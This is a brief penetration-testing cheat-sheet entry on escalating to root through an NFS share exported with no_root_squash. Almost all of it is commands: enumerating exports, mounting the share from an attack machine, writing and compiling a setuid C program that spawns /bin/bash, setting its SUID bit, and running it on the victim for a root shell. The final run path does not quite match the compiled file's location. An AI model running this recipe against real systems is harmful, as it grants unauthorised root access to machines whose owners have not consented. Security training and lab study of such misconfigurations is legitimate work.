NFS Root Squashing (Network File Sharing)

When no_root_squash appears in /etc/exports, the folder is shareable and a remote user can mount it.

cat /etc/exports

1. remote check the name of the folder

showmount -e <remote_ip>

1. Create a temporary directory on our attack machine.

mkdir /tmp/1

1. Mount the target directory.

mount -o rw,vers=2 <remote_ip>:<target_directory> /tmp/1

mount -t nfs 10.10.10.10:/shared /tmp/nfsdir cd /tmp/nfsdir

1. Prepare the privesc source code x.c.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

1. Compile the source code.

gcc /tmp/1/x.c -o /tmp/1/x

1. Turn on the SUID bit.

chmod +s /tmp/1/x

1. Trigger the payload on the victim machine.

/tmp/x